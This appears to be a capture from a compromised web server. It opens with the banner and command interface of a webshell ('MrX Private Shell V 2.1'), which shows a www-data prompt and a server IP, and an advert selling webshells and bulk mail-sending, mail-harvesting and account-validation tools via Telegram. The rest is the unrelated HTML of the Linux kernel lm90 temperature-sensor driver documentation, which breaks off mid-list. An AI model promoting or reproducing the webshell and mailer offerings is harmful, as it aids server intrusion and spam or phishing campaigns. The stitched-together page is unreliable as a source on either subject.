__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.217.121: ~ $
<!DOCTYPE html>

<html lang="en" data-content_root="../">
  <head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />

    <title>Kernel driver lm90 &#8212; The Linux Kernel  documentation</title>
    <link rel="stylesheet" type="text/css" href="../_static/pygments.css?v=fa44fd50" />
    <link rel="stylesheet" type="text/css" href="../_static/alabaster.css?v=3918102e" />
    <script src="../_static/documentation_options.js?v=5929fcd5"></script>
    <script src="../_static/doctools.js?v=9bcbadda"></script>
    <script src="../_static/sphinx_highlight.js?v=dc90522c"></script>
    <link rel="index" title="Index" href="../genindex.html" />
    <link rel="search" title="Search" href="../search.html" />
    <link rel="next" title="Kernel driver lm92" href="lm92.html" />
    <link rel="prev" title="Kernel driver lm87" href="lm87.html" />
   
  <link rel="stylesheet" href="../_static/custom.css" type="text/css" />
  

  
  

  </head><body>
  <div class="document">
    
      <div class="sphinxsidebar" role="navigation" aria-label="Main">
        <div class="sphinxsidebarwrapper">
            <p class="logo"><a href="../index.html">
              <img class="logo" src="../_static/logo.svg" alt="Logo of The Linux Kernel"/>
            </a></p>
<h1 class="logo"><a href="../index.html">The Linux Kernel</a></h1>



<p class="blurb">6.18.50</p>







<search id="searchbox" style="display: none" role="search">
  <h3 id="searchlabel">Quick search</h3>
    <div class="searchformwrapper">
    <form class="search" action="../search.html" method="get">
      <input type="text" name="q" aria-labelledby="searchlabel" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/>
      <input type="submit" value="Go" />
    </form>
    </div>
</search>
<script>document.getElementById('searchbox').style.display = "block"</script>


<p>
<h3 class="kernel-toc-contents">Contents</h3>
<input type="checkbox" class="kernel-toc-toggle" id = "kernel-toc-toggle" checked>
<label class="kernel-toc-title" for="kernel-toc-toggle"></label>

<div class="kerneltoc" id="kerneltoc">
<ul>
<li class="toctree-l1"><a class="reference internal" href="../process/development-process.html">Development process</a></li>
<li class="toctree-l1"><a class="reference internal" href="../process/submitting-patches.html">Submitting patches</a></li>
<li class="toctree-l1"><a class="reference internal" href="../process/code-of-conduct.html">Code of conduct</a></li>
<li class="toctree-l1"><a class="reference internal" href="../maintainer/index.html">Maintainer handbook</a></li>
<li class="toctree-l1"><a class="reference internal" href="../process/index.html">All development-process docs</a></li>
</ul>
<ul class="current">
<li class="toctree-l1"><a class="reference internal" href="../core-api/index.html">Core API</a></li>
<li class="toctree-l1"><a class="reference internal" href="../driver-api/index.html">Driver APIs</a></li>
<li class="toctree-l1 current"><a class="reference internal" href="../subsystem-apis.html">Subsystems</a><ul class="current">
<li class="toctree-l2"><a class="reference internal" href="../subsystem-apis.html#core-subsystems">Core subsystems</a></li>
<li class="toctree-l2"><a class="reference internal" href="../subsystem-apis.html#human-interfaces">Human interfaces</a></li>
<li class="toctree-l2"><a class="reference internal" href="../subsystem-apis.html#networking-interfaces">Networking interfaces</a></li>
<li class="toctree-l2"><a class="reference internal" href="../subsystem-apis.html#storage-interfaces">Storage interfaces</a></li>
<li class="toctree-l2 current"><a class="reference internal" href="../subsystem-apis.html#other-subsystems">Other subsystems</a><ul class="current">
<li class="toctree-l3"><a class="reference internal" href="../accounting/index.html">Accounting</a></li>
<li class="toctree-l3"><a class="reference internal" href="../cpu-freq/index.html">CPUFreq - CPU frequency and voltage scaling code in the Linux(TM) kernel</a></li>
<li class="toctree-l3"><a class="reference internal" href="../edac/index.html">EDAC Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../fpga/index.html">FPGA</a></li>
<li class="toctree-l3"><a class="reference internal" href="../i2c/index.html">I2C/SMBus Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../iio/index.html">Industrial I/O</a></li>
<li class="toctree-l3"><a class="reference internal" href="../pcmcia/index.html">PCMCIA</a></li>
<li class="toctree-l3"><a class="reference internal" href="../spi/index.html">Serial Peripheral Interface (SPI)</a></li>
<li class="toctree-l3"><a class="reference internal" href="../w1/index.html">1-Wire Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../watchdog/index.html">Watchdog Support</a></li>
<li class="toctree-l3"><a class="reference internal" href="../virt/index.html">Virtualization Support</a></li>
<li class="toctree-l3 current"><a class="reference internal" href="index.html">Hardware Monitoring</a></li>
<li class="toctree-l3"><a class="reference internal" href="../accel/index.html">Compute Accelerators</a></li>
<li class="toctree-l3"><a class="reference internal" href="../security/index.html">Security Documentation</a></li>
<li class="toctree-l3"><a class="reference internal" href="../crypto/index.html">Crypto API</a></li>
<li class="toctree-l3"><a class="reference internal" href="../bpf/index.html">BPF Documentation</a></li>
<li class="toctree-l3"><a class="reference internal" href="../usb/index.html">USB support</a></li>
<li class="toctree-l3"><a class="reference internal" href="../PCI/index.html">PCI Bus Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../misc-devices/index.html">Assorted Miscellaneous Devices Documentation</a></li>
<li class="toctree-l3"><a class="reference internal" href="../peci/index.html">PECI Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../wmi/index.html">WMI Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../tee/index.html">TEE Subsystem</a></li>
</ul>
</li>
</ul>
</li>
<li class="toctree-l1"><a class="reference internal" href="../locking/index.html">Locking</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../process/license-rules.html">Licensing rules</a></li>
<li class="toctree-l1"><a class="reference internal" href="../doc-guide/index.html">Writing documentation</a></li>
<li class="toctree-l1"><a class="reference internal" href="../dev-tools/index.html">Development tools</a></li>
<li class="toctree-l1"><a class="reference internal" href="../dev-tools/testing-overview.html">Testing guide</a></li>
<li class="toctree-l1"><a class="reference internal" href="../kernel-hacking/index.html">Hacking guide</a></li>
<li class="toctree-l1"><a class="reference internal" href="../trace/index.html">Tracing</a></li>
<li class="toctree-l1"><a class="reference internal" href="../fault-injection/index.html">Fault injection</a></li>
<li class="toctree-l1"><a class="reference internal" href="../livepatch/index.html">Livepatching</a></li>
<li class="toctree-l1"><a class="reference internal" href="../rust/index.html">Rust</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../admin-guide/index.html">Administration</a></li>
<li class="toctree-l1"><a class="reference internal" href="../kbuild/index.html">Build system</a></li>
<li class="toctree-l1"><a class="reference internal" href="../admin-guide/reporting-issues.html">Reporting issues</a></li>
<li class="toctree-l1"><a class="reference internal" href="../tools/index.html">Userspace tools</a></li>
<li class="toctree-l1"><a class="reference internal" href="../userspace-api/index.html">Userspace API</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../firmware-guide/index.html">Firmware</a></li>
<li class="toctree-l1"><a class="reference internal" href="../devicetree/index.html">Firmware and Devicetree</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../arch/index.html">CPU architectures</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../staging/index.html">Unsorted documentation</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../translations/index.html">Translations</a></li>
</ul>

</div>

<script type="text/javascript"> <!--
  var sbar = document.getElementsByClassName("sphinxsidebar")[0];
  let currents = document.getElementsByClassName("current")
  if (currents.length) {
    sbar.scrollTop = currents[currents.length - 1].offsetTop;
  }
  --> </script>
  <div role="note" aria-label="source link">
    <h3>This Page</h3>
    <ul class="this-page-menu">
      <li><a href="../_sources/hwmon/lm90.rst.txt"
            rel="nofollow">Show Source</a></li>
    </ul>
   </div>
        </div>
      </div>
      <div class="documentwrapper">
        <div class="bodywrapper">
          

          <div class="body" role="main">
            
  



<section id="kernel-driver-lm90">
<h1>Kernel driver lm90<a class="headerlink" href="#kernel-driver-lm90" title="Link to this heading">¶</a></h1>
<p>Supported chips:</p>
<blockquote>
<div><ul>
<li><p>National Semiconductor LM84</p>
<p>Prefix: ‘lm84’</p>
<p>Addresses scanned: I2C 0x18 - 0x1a, 0x29 - 0x2b, 0x4c - 0x4e</p>
<p>Datasheet: Publicly available at the National Semiconductor website</p>
</li>
<li><p>National Semiconductor LM90</p>
<p>Prefix: ‘lm90’</p>
<p>Addresses scanned: I2C 0x4c</p>
<p>Datasheet: Publicly available at the National Semiconductor website</p>
<blockquote>
<div><p><a class="reference external" href="http://www.national.com/pf/LM/LM90.html">http://www.national.com/pf/LM/LM90.html</a></p>
</div></blockquote>
</li>
<li><p>National Semiconductor LM89</p>
<p>Prefix: ‘lm89’ (no auto-detection)</p>
<p>Addresses scanned: I2C 0x4c and 0x4d</p>
<p>Datasheet: Publicly available at the National Semiconductor website</p>
<blockquote>
<div><p><a class="reference external" href="http://www.national.com/mpf/LM/LM89.html">http://www.national.com/mpf/LM/LM89.html</a></p>
</div></blockquote>
</li>
<li><p>National Semiconductor LM99</p>
<p>Prefix: ‘lm99’</p>
<p>Addresses scanned: I2C 0x4c and 0x4d</p>
<p>Datasheet: Publicly available at the National Semiconductor website</p>
<blockquote>
<div><p><a class="reference external" href="http://www.national.com/pf/LM/LM99.html">http://www.national.com/pf/LM/LM99.html</a></p>
</div></blockquote>
</li>
<li><p>National Semiconductor LM86</p>
<p>Prefix: ‘lm86’</p>
<p>Addresses scanned: I2C 0x4c</p>
<p>Datasheet: Publicly available at the National Semiconductor website</p>
<blockquote>
<div><p><a class="reference external" href="http://www.national.com/mpf/LM/LM86.html">http://www.national.com/mpf/LM/LM86.html</a></p>
</div></blockquote>
</li>
<li><p>Analog Devices ADM1020</p>
<p>Prefix: ‘adm1020’</p>
<p>Addresses scanned: I2C 0x4c - 0x4e</p>
<p>Datasheet: Publicly available at the Analog Devices website</p>
</li>
<li><p>Analog Devices ADM1021</p>
<p>Prefix: ‘adm1021’</p>
<p>Addresses scanned: I2C 0x18 - 0x1a, 0x29 - 0x2b, 0x4c - 0x4e</p>
<p>Datasheet: Publicly available at the Analog Devices website</p>
</li>
<li><p>Analog Devices ADM1021A/ADM1023</p>
<p>Prefix: ‘adm1023’</p>
<p>Addresses scanned: I2C 0x18 - 0x1a, 0x29 - 0x2b, 0x4c - 0x4e</p>
<p>Datasheet: Publicly available at the Analog Devices website</p>
</li>
<li><p>Analog Devices ADM1032</p>
<p>Prefix: ‘adm1032’</p>
<p>Addresses scanned: I2C 0x4c and 0x4d</p>
<p>Datasheet: Publicly available at the ON Semiconductor website</p>
<blockquote>
<div><p><a class="reference external" href="https://www.onsemi.com/PowerSolutions/product.do?id=ADM1032">https://www.onsemi.com/PowerSolutions/product.do?id=ADM1032</a></p>
</div></blockquote>
</li>
<li><p>Analog Devices ADT7461</p>
<p>Prefix: ‘adt7461’</p>
<p>Addresses scanned: I2C 0x4c and 0x4d</p>
<p>Datasheet: Publicly available at the ON Semiconductor website</p>
<blockquote>
<div><p><a class="reference external" href="https://www.onsemi.com/PowerSolutions/product.do?id=ADT7461">https://www.onsemi.com/PowerSolutions/product.do?id=ADT7461</a></p>
</div></blockquote>
</li>
<li><p>Analog Devices ADT7461A</p>
<p>Prefix: ‘adt7461a’</p>
<p>Addresses scanned: I2C 0x4c and 0x4d</p>
<p>Datasheet: Publicly available at the ON Semiconductor website</p>
<blockquote>
<div><p><a class="reference external" href="https://www.onsemi.com/PowerSolutions/product.do?id=ADT7461A">https://www.onsemi.com/PowerSolutions/product.do?id=ADT7461A</a></p>
</div></blockquote>
</li>
<li><p>Analog Devices ADT7481</p>
<p>Prefix: ‘adt7481’</p>
<p>Addresses scanned: I2C 0x4b and 0x4c</p>
<p>Datasheet: Publicly available at the ON Semiconductor website</p>
<blockquote>
<div><p><a class="reference external" href="https://www.onsemi.com/PowerSolutions/product.do?id=ADT7481">https://www.onsemi.com/PowerSolutions/product.do?id=ADT7481</a></p>
</div></blockquote>
</li>
<li><p>Analog Devices ADT7482</p>
<p>Prefix: ‘adt7482’</p>
<p>Addresses scanned: I2C 0x4c</p>
<p>Datasheet: Publicly available at the ON Semiconductor website</p>
<blockquote>
<div><p><a class="reference external" href="https://www.onsemi.com/PowerSolutions/product.do?id=ADT7482">https://www.onsemi.com/PowerSolutions/product.do?id=ADT7482</a></p>
</div></blockquote>
</li>
<li><p>Analog Devices ADT7483A</p>
<p>Prefix: ‘adt7483a’</p>
<p>Addresses scanned: I2C 0x18, 0x19, 0x1a, 0x29, 0x2a, 0x2b, 0x4c, 0x4d, 0x4e</p>
<p>Datasheet: Publicly available at the ON Semiconductor website</p>
<blockquote>
<div><p><a class="reference external" href="https://www.onsemi.com/PowerSolutions/product.do?id=ADT7483A">https://www.onsemi.com/PowerSolutions/product.do?id=ADT7483A</a></p>
</div></blockquote>
</li>
<li><p>ON Semiconductor NCT1008</p>
<p>Prefix: ‘nct1008’</p>
<p>Addresses scanned: I2C 0x4c and 0x4d</p>
<p>Datasheet: Publicly available at the ON Semiconductor website</p>
<blockquote>
<div><p><a class="reference external" href="https://www.onsemi.com/PowerSolutions/product.do?id=NCT1008">https://www.onsemi.com/PowerSolutions/product.do?id=NCT1008</a></p>
</div></blockquote>
</li>
<li><p>ON Semiconductor NCT210</p>
<p>Prefix: ‘adm1021’</p>
<p>Addresses scanned: I2C 0x18 - 0x1a, 0x29 - 0x2b, 0x4c - 0x4e</p>
<p>Datasheet: Publicly available at the ON Semiconductor website</p>
<blockquote>
<div><p><a class="reference external" href="https://www.onsemi.com/PowerSolutions/product.do?id=NCT210">https://www.onsemi.com/PowerSolutions/product.do?id=NCT210</a></p>
</div></blockquote>
</li>
<li><p>ON Semiconductor NCT214</p>
<p>Prefix: ‘nct214’</p>
<p>Addresses scanned: I2C 0x18 - 0x1a, 0x29 - 0x2b, 0x4c - 0x4e</p>
<p>Datasheet: Publicly available at the ON Semiconductor website</p>
<blockquote>
<div><p><a class="reference external" href="https://www.onsemi.com/PowerSolutions/product.do?id=NCT214">https://www.onsemi.com/PowerSolutions/product.do?id=NCT214</a></p>
</div></blockquote>
</li>
<li><p>ON Semiconductor NCT218</p>
<p>Prefix: ‘nct218’</p>
<p>Addresses scanned: I2C 0x4c - 0x4d</p>
<p>Datasheet: Publicly available at the ON Semiconductor website</p>
<blockquote>
<div><p><a class="reference external" href="https://www.onsemi.com/PowerSolutions/product.do?id=NCT218">https://www.onsemi.com/PowerSolutions/product.do?id=NCT218</a></p>
</div></blockquote>
</li>
<li><p>ON Semiconductor NCT72</p>
<p>Prefix: ‘nct72’</p>
<p>Addresses scanned: I2C 0x4c - 0x4d</p>
<p>Datasheet: Publicly available at the ON Semiconductor website</p>
<blockquote>
<div><p><a class="reference external" href="https://www.onsemi.com/PowerSolutions/product.do?id=NCT72">https://www.onsemi.com/PowerSolutions/product.do?id=NCT72</a></p>
</div></blockquote>
</li>
<li><p>Maxim MAX1617</p>
<p>Prefix: ‘max1617’</p>
<p>Addresses scanned: I2C 0x18 - 0x1a, 0x29 - 0x2b, 0x4c - 0x4e</p>
<p>Datasheet: Publicly available at the Maxim website</p>
</li>
<li><p>Maxim MAX1617A</p>
<p>Prefix: ‘max1617a’</p>
<p>Addresses scanned: I2C 0x18 - 0x1a, 0x29 - 0x2b, 0x4c - 0x4e</p>
<p>Datasheet: Publicly available at the Maxim website</p>
</li>
<li><p>Maxim MAX6642</p>
<p>Prefix: ‘max6642’</p>
<p>Addresses scanned: I2C 0x48-0x4f</p>
<p>Datasheet: Publicly available at the Maxim website</p>
<blockquote>
<div><p><a class="reference external" href="http://datasheets.maxim-ic.com/en/ds/MAX6642.pdf">http://datasheets.maxim-ic.com/en/ds/MAX6642.pdf</a></p>
</div></blockquote>
</li>
<li><p>Maxim MAX6646</p>
<p>Prefix: ‘max6646’</p>
<p>Addresses scanned: I2C 0x4d</p>
<p>Datasheet: Publicly available at the Maxim website</p>
<blockquote>
<div><p><a class="reference external" href="http://www.maxim-ic.com/quick_view2.cfm/qv_pk/3497">http://www.maxim-ic.com/quick_view2.cfm/qv_pk/3497</a></p>
</div></blockquote>
</li>
<li><p>Maxim MAX6647</p>
<p>Prefix: ‘max6646’</p>
<p>Addresses scanned: I2C 0x4e</p>
<p>Datasheet: Publicly available at the Maxim website</p>
<blockquote>
<div><p><a class="reference external" href="http://www.maxim-ic.com/quick_view2.cfm/qv_pk/3497">http://www.maxim-ic.com/quick_view2.cfm/qv_pk/3497</a></p>
</div></blockquote>
</li>
<li><p>Maxim MAX6648</p>
<p>Prefix: ‘max6648’</p>
<p>Addresses scanned: I2C 0x4c</p>
<p>Datasheet: Publicly available at the Maxim website</p>
<blockquote>
<div><p><a class="reference external" href="http://www.maxim-ic.com/quick_view2.cfm/qv_pk/3500">http://www.maxim-ic.com/quick_view2.cfm/qv_pk/3500</a></p>
</div></blockquote>
</li>
<li><p>Maxim MAX6649</p>
<p>Prefix: ‘max6646’</p>
<p>Addresses scanned: I2C 0x4c</p>
<p>Datasheet: Publicly available at the Maxim website</p>
<blockquote>
<div><p><a class="reference external" href="http://www.maxim-ic.com/quick_view2.cfm/qv_pk/3497">http://www.maxim-ic.com/quick_view2.cfm/qv_pk/3497</a></p>
</div></blockquote>
</li>
<li><p>Maxim MAX6654</p>
<p>Prefix: ‘max6654’</p>
<p>Addresses scanned: I2C 0x18, 0x19, 0x1a, 0x29, 0x2a, 0x2b,</p>
<blockquote>
<div><p>0x4c, 0x4d and 0x4e</p>
</div></blockquote>
<p>Datasheet: Publicly available at the Maxim website</p>
<blockquote>
<div><p><a class="reference external" href="https://www.maximintegrated.com/en/products/sensors/MAX6654.html">https://www.maximintegrated.com/en/products/sensors/MAX6654.html</a></p>
</div></blockquote>
</li>
<li><p>Maxim MAX6657</p>
<p>Prefix: ‘max6657’</p>
<p>Addresses scanned: I2C 0x4c</p>
<p>Datasheet: Publicly available at the Maxim website</p>
<blockquote>
<div><p><a class="reference external" href="http://www.maxim-ic.com/quick_view2.cfm/qv_pk/2578">http://www.maxim-ic.com/quick_view2.cfm/qv_pk/2578</a></p>
</div></blockquote>
</li>
<li><p>Maxim MAX6658</p>
<p>Prefix: ‘max6657’</p>
<p>Addresses scanned: I2C 0x4c</p>
<p>Datasheet: Publicly available at the Maxim website</p>
<blockquote>
<div><p><a class="reference external" href="http://www.maxim-ic.com/quick_view2.cfm/qv_pk/2578">http://www.maxim-ic.com/quick_view2.cfm/qv_pk/2578</a></p>
</div></blockquote>
</li>
<li><p>Maxim MAX6659</p>
<p>Prefix: ‘max6659’</p>
<p>Addresses scanned: I2C 0x4c, 0x4d, 0x4e</p>
<p>Datasheet: Publicly available at the Maxim website</p>
<blockquote>
<div><p><a class="reference external" href="http://www.maxim-ic.com/quick_view2.cfm/qv_pk/2578">http://www.maxim-ic.com/quick_view2.cfm/qv_pk/2578</a></p>
</div></blockquote>
</li>
<li><p>Maxim MAX6680</p>
<p>Prefix: ‘max6680’</p>
<p>Addresses scanned: I2C 0x18, 0x19, 0x1a, 0x29, 0x2a, 0x2b,</p>
<blockquote>
<div><p>0x4c, 0x4d and 0x4e</p>
</div></blockquote>
<p>Datasheet: Publicly available at the Maxim website</p>
<blockquote>
<div><p><a class="reference external" href="http://www.maxim-ic.com/quick_view2.cfm/qv_pk/3370">http://www.maxim-ic.com/quick_view2.cfm/qv_pk/3370</a></p>
</div></blockquote>
</li>
<li><p>Maxim MAX6681</p>
<p>Prefix: ‘max6680’</p>
<p>Addresses scanned: I2C 0x18, 0x19, 0x1a, 0x29, 0x2a, 0x2b,</p>
<blockquote>
<div><p>0x4c, 0x4d and 0x4e</p>
</div></blockquote>
<p>Datasheet: Publicly available at the Maxim website</p>
<blockquote>
<div><p><a class="reference external" href="http://www.maxim-ic.com/quick_view2.cfm/qv_pk/3370">http://www.maxim-ic.com/quick_view2.cfm/qv_pk/3370</a></p>
</div></blockquote>
</li>
<li><p>Maxim MAX6692</p>
<p>Prefix: ‘max6648’</p>
<p>Addresses scanned: I2C 0x4c</p>
<p>Datasheet: Publicly available at the Maxim website</p>
<blockquote>
<div><p><a class="reference external" href="http://www.maxim-ic.com/quick_view2.cfm/qv_pk/3500">http://www.maxim-ic.com/quick_view2.cfm/qv_pk/3500</a></p>
</div></blockquote>
</li>
<li><p>Maxim MAX6695</p>
<p>Prefix: ‘max6695’</p>
<p>Addresses scanned: I2C 0x18</p>
<p>Datasheet: Publicly available at the Maxim website</p>
<blockquote>
<div><p><a class="reference external" href="http://www.maxim-ic.com/datasheet/index.mvp/id/4199">http://www.maxim-ic.com/datasheet/index.mvp/id/4199</a></p>
</div></blockquote>
</li>
<li><p>Maxim MAX6696</p>
<p>Prefix: ‘max6695’</p>
<p>Addresses scanned: I2C 0x18, 0x19, 0x1a, 0x29, 0x2a, 0x2b,</p>
<blockquote>
<div><p>0x4c, 0x4d and 0x4e</p>
</div></blockquote>
<p>Datasheet: Publicly available at the Maxim website</p>
<blockquote>
<div><p><a class="reference external" href="http://www.maxim-ic.com/datasheet/index.mvp/id/4199">http://www.maxim-ic.com/datasheet/index.mvp/id/4199</a></p>
</div></blockquote>
</li>
<li><p>Winbond/Nuvoton W83L771W/G</p>
<p>Prefix: ‘w83l771’</p>
<p>Addresses scanned: I2C 0x4c</p>
<p>Datasheet: No longer available</p>
</li>
<li><p>Winbond/Nuvoton W83L771AWG/ASG</p>
<p>Prefix: ‘w83l771’</p>
<p>Addresses scanned: I2C 0x4c</p>
<p>Datasheet: Not publicly available, can be requested from Nuvoton</p>
</li>
<li><p>Nuvoton NCT7716</p>
<p>Prefix: ‘nct7716’</p>
<p>Addresses scanned: I2C 0x48, 0x49</p>
<p>Datasheet: Not publicly available, can be requested from Nuvoton</p>
</li>
<li><p>Nuvoton NCT7717</p>
<p>Prefix: ‘nct7717’</p>
<p>Addresses scanned: I2C 0x48</p>
<p>Datasheet: Publicly available at Nuvoton website</p>
<blockquote>
<div><p><a class="reference external" href="https://www.nuvoton.com/resource-files/Nuvoton_NCT7717U_Datasheet_V111.pdf">https://www.nuvoton.com/resource-files/Nuvoton_NCT7717U_Datasheet_V111.pdf</a></p>
</div></blockquote>
</li>
<li><p>Nuvoton NCT7718</p>
<p>Prefix: ‘nct7718’</p>
<p>Addresses scanned: I2C 0x4c</p>
<p>Datasheet: Publicly available at Nuvoton website</p>
<blockquote>
<div><p><a class="reference external" href="https://www.nuvoton.com/resource-files/Nuvoton_NCT7718W_Datasheet_V11.pdf">https://www.nuvoton.com/resource-files/Nuvoton_NCT7718W_Datasheet_V11.pdf</a></p>
</div></blockquote>
</li>
<li><p>Philips/NXP SA56004X</p>
<p>Prefix: ‘sa56004’</p>
<p>Addresses scanned: I2C 0x48 through 0x4F</p>
<p>Datasheet: Publicly available at NXP website</p>
<blockquote>
<div><p><a class="reference external" href="http://ics.nxp.com/products/interface/datasheet/sa56004x.pdf">http://ics.nxp.com/products/interface/datasheet/sa56004x.pdf</a></p>
</div></blockquote>
</li>
<li><p>GMT G781</p>
<p>Prefix: ‘g781’</p>
<p>Addresses scanned: I2C 0x4c, 0x4d</p>
<p>Datasheet: Not publicly available from GMT</p>
</li>
<li><p>Texas Instruments TMP451</p>
<p>Prefix: ‘tmp451’</p>
<p>Addresses scanned: I2C 0x4c</p>
<p>Datasheet: Publicly available at TI website</p>
<blockquote>
<div><p><a class="reference external" href="https://www.ti.com/litv/pdf/sbos686">https://www.ti.com/litv/pdf/sbos686</a></p>
</div></blockquote>
</li>
<li><p>Texas Instruments TMP461</p>
<p>Prefix: ‘tmp461’</p>
<p>Addresses scanned: I2C 0x48 through 0x4F</p>
<p>Datasheet: Publicly available at TI website</p>
<blockquote>
<div><p><a class="reference external" href="https://www.ti.com/lit/gpn/tmp461">https://www.ti.com/lit/gpn/tmp461</a></p>
</div></blockquote>
</li>
<li><p>Philips NE1617, NE1617A</p>
<p>Prefix: ‘max1617’ (probably detected as a max1617)</p>
<p>Addresses scanned: I2C 0x18 - 0x1a, 0x29 - 0x2b, 0x4c - 0x4e</p>
<p>Datasheets: Publicly available at the Philips website</p>
</li>
<li><p>Philips NE1618</p>
<p>Prefix: ‘ne1618’</p>
<p>Addresses scanned: I2C 0x18 - 0x1a, 0x29 - 0x2b, 0x4c - 0x4e</p>
<p>Datasheets: Publicly available at the Philips website</p>
</li>
<li><p>Genesys Logic GL523SM</p>
<p>Prefix: ‘gl523sm’</p>
<p>Addresses scanned: I2C 0x18 - 0x1a, 0x29 - 0x2b, 0x4c - 0x4e</p>
<p>Datasheet:</p>
</li>
<li><p>TI THMC10</p>
<p>Prefix: ‘thmc10’</p>
<p>Addresses scanned: I2C 0x18 - 0x1a, 0x29 - 0x2b, 0x4c - 0x4e</p>
<p>Datasheet: Publicly available at the TI website</p>
</li>
<li><p>Onsemi MC1066</p>
<p>Prefix: ‘mc1066’</p>
<p>Addresses scanned: I2C 0x18 - 0x1a, 0x29 - 0x2b, 0x4c - 0x4e</p>
<p>Datasheet: Publicly available at the Onsemi website</p>
</li>
</ul>
</div></blockquote>
<p>Author: Jean Delvare &lt;<a class="reference external" href="mailto:jdelvare&#37;&#52;&#48;suse&#46;de">jdelvare<span>&#64;</span>suse<span>&#46;</span>de</a>&gt;</p>
<section id="description">
<h2>Description<a class="headerlink" href="#description" title="Link to this heading">¶</a></h2>
<p>The LM90 is a digital temperature sensor. It senses its own temperature as
well as the temperature of up to one external diode. It is compatible
with many other devices, many of which are supported by this driver.</p>
<p>The family of chips supported by this driver is derived from MAX1617.
This chip as well as various compatible chips support a local and a remote
temperature sensor with 8 bit accuracy. Later chips provide improved accuracy
and other additional features such as hysteresis and temperature offset
registers.</p>
<p>Note that there is no easy way to differentiate between the MAX6657,
MAX6658 and MAX6659 variants. The extra features of the MAX6659 are only
supported by this driver if the chip is located at address 0x4d or 0x4e,
or if the chip type is explicitly selected as max6659.
The MAX6680 and MAX6681 only differ in their pinout, therefore they obviously
can’t (and don’t need to) be distinguished.</p>
<p>The different chipsets of the family are not strictly identical, although
very similar. For reference, here comes a non-exhaustive list of specific
features:</p>
<dl class="simple">
<dt>LM84:</dt><dd><ul class="simple">
<li><p>8 bit sensor resolution</p></li>
</ul>
</dd>
<dt>ADM1020, ADM1021, GL523SM, MAX1617, NE1617, NE1617A, THMC10:</dt><dd><ul class="simple">
<li><p>8 bit sensor resolution</p></li>
<li><p>Low temperature limits</p></li>
</ul>
</dd>
<dt>NCT210, NE1618:</dt><dd><ul class="simple">
<li><p>11 bit sensor resolution for remote temperature sensor</p></li>
<li><p>Low temperature limits</p></li>
</ul>
</dd>
<dt>ADM1021A, ADM1023:</dt><dd><ul class="simple">
<li><p>Temperature offset register for remote temperature sensor</p></li>
<li><p>11 bit resolution for remote temperature sensor</p></li>
<li><p>Low temperature limits</p></li>
</ul>
</dd>
<dt>LM90:</dt><dd><ul class="simple">
<li><p>11 bit resolution for remote temperature sensor</p></li>
<li><p>Temperature offset register for remote temperature sensor</p></li>
<li><p>Low and critical temperature limits</p></li>
<li><p>Configurable conversion rate</p></li>
<li><p>Filter and alert configuration register at 0xBF.</p></li>
<li><p>ALERT is triggered by temperatures over critical limits.</p></li>
</ul>
</dd>
<dt>LM86 and LM89:</dt><dd><ul class="simple">
<li><p>Same as LM90</p></li>
<li><p>Better external channel accuracy</p></li>
</ul>
</dd>
<dt>LM99:</dt><dd><ul class="simple">
<li><p>Same as LM89</p></li>
<li><p>External temperature shifted by 16 degrees down</p></li>
</ul>
</dd>
<dt>ADM1032:</dt><dd><ul class="simple">
<li><p>Consecutive alert register at 0x22.</p></li>
<li><p>Conversion averaging.</p></li>
<li><p>Up to 64 conversions/s.</p></li>
<li><p>ALERT is triggered by open remote sensor.</p></li>
<li><p>SMBus PEC support for Write Byte and Receive Byte transactions.</p></li>
</ul>
</dd>
<dt>ADT7461, ADT7461A, NCT1008:</dt><dd><ul class="simple">
<li><p>Extended temperature range (breaks compatibility)</p></li>
<li><p>Lower resolution for remote temperature</p></li>
<li><p>SMBus PEC support for Write Byte and Receive Byte transactions.</p></li>
<li><p>10 bit temperature resolution</p></li>
</ul>
</dd>
<dt>ADT7481, ADT7482, ADT7483:</dt><dd><ul class="simple">
<li><p>Temperature offset register</p></li>
<li><p>SMBus PEC support</p></li>
<li><p>10 bit temperature resolution for external sensors</p></li>
<li><p>Two remote sensors</p></li>
<li><p>Selectable address (ADT7483)</p></li>
</ul>
</dd>
<dt>MAX6642:</dt><dd><ul class="simple">
<li><p>No critical limit register</p></li>
<li><p>Conversion rate not configurable</p></li>
<li><p>Better local resolution (10 bit)</p></li>
<li><p>10 bit external sensor resolution</p></li>
</ul>
</dd>
<dt>MAX6646, MAX6647, MAX6649:</dt><dd><ul class="simple">
<li><p>Better local resolution</p></li>
<li><p>Extended range unsigned external temperature</p></li>
</ul>
</dd>
<dt>MAX6648, MAX6692:</dt><dd><ul class="simple">
<li><p>Better local resolution</p></li>
<li><p>Unsigned temperature</p></li>
</ul>
</dd>
<dt>MAX6654, MAX6690:</dt><dd><ul class="simple">
<li><p>Better local resolution</p></li>
<li><p>Selectable address</p></li>
<li><p>Remote sensor type selection</p></li>
<li><p>Extended temperature range</p></li>
